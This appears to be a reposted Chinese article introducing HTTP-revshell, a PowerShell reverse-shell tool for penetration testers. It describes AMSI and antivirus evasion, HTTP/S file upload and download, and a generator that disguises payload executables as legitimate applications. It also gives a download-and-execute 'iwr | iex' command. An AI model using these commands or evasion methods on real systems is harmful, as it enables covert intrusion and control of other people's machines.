HTTP-revshell是什么意思
发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,这篇文章将为大家详细讲解有关HTTP-revshell是什么意思,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。HTTP-revshellHTTP-revshell是
千家信息网最后更新 2025年02月01日HTTP-revshell是什么意思
这篇文章将为大家详细讲解有关HTTP-revshell是什么意思,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
HTTP-revshell
HTTP-revshell是一个能够绕过AMSI的PowerShell代理感知型反向Shell,这款工具转为红队研究人员以及渗透测试人员设计,能够通过HTTP/S协议来给研究人员提供一个反向Shell链接。HTTP-revshell使用了一种隐蔽的数据信道,可以通过Web请求来获取目标设备的控制权,从而绕过类似IDS、IPS和AV之类的安全解决方案。
功能介绍
SSL
代理感知
上传功能
下载功能
错误控制
AMSI绕过
服务器端多会话支持
PowerShell函数自动补全
工具安装
广大研究人员可以使用下列命令将该项目源码克隆至本地,并完成依赖组件的自动化安装:
git clone https://github.com/3v4Si0N/HTTP-revshell.gitcd HTTP-revshell/pip3 install -r requirements.txt
数据提取功能使用
上传:
upload /src/path/file C:\dest\path\file
下载:
download C:\src\path\file /dst/path/file
查看server.py帮助-服务器端使用
usage: server.py [-h] [--ssl] [--autocomplete] host port Process some integers. positional arguments: host Listen Host port Listen Port optional arguments: -h, --help show this help message and exit --ssl Send traffic over ssl --autocomplete Autocomplete powershell functions
查看WebRev.ps1帮助-客户端使用
Import-Module .\Invoke-WebRev.ps1Invoke-WebRev -ip IP -port PORT [-ssl]
工具使用-server-multisession.py(服务器端多会话支持)
服务器端支持同时与客户端建立多个链接,下面给出的菜单中包含三哥基础命令,即sessions、interact和exit:
- sessions --> 显示当前活动会话 - interact --> 与一个会话进行交互,比如说:interact- exit --> 关闭应用程序
如需修改会话,可以按下CTRL+D来退出当前会话,此时不会关闭原有会话。
Revshell-Generator.ps1-Payload自动生成器
这个脚本可以帮助我们创建一个带有Payload的可执行文件,这个文件是我们使用HTTP-revshell所必须的。工具提供了六个预定义的模板和一个支持自定义的模板。工具生成的Payload会伪装成合法应用程序的图标、产品信息和版权信息等等。除此之外,它们都会在与服务器建立连接之前打开原始的应用程序,并伪装成合法应用程序来执行。
Payload生成器使用:
powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"
工具使用样例
关于"HTTP-revshell是什么意思"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
工具
服务器
服务
人员
功能
应用程序
程序
帮助
应用
支持
研究人员
篇文章
生成
研究
意思
合法
信息
命令
客户
客户端
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
厦门宝信软件开发公司
苏州在事业单位做软件开发
网络安全孵化基地批前公示
命令行查看数据库地址
姜堰区环保网络技术诚信服务
新沂网络安全保卫大队民警警号
网络安全隐患怎么防范
政府采购软件开发
提高计算机网络安全防护
云上城之歌服务器加载不出来
智能开锁app软件开发
春节期间网络安全防护计划
平台服务器
网络安全工作经历
网络安全与计算机技术专业好吗
滨州制造业软件开发服务
上海数字化智慧校园软件开发
仓库系统更改数据库
郑州应用软件开发有用吗
英特尔软件开发工程师
阿姆斯特丹超级数据库
下列网络安全法的特征的是
数据库元数据管理器
数据库沙箱
数据库字段名能否带括号
杭州市网络安全研究所图片
陕西曙光服务器维修维保哪家好
金融软件开发语言
商品上下架数据库
幻塔好友服务器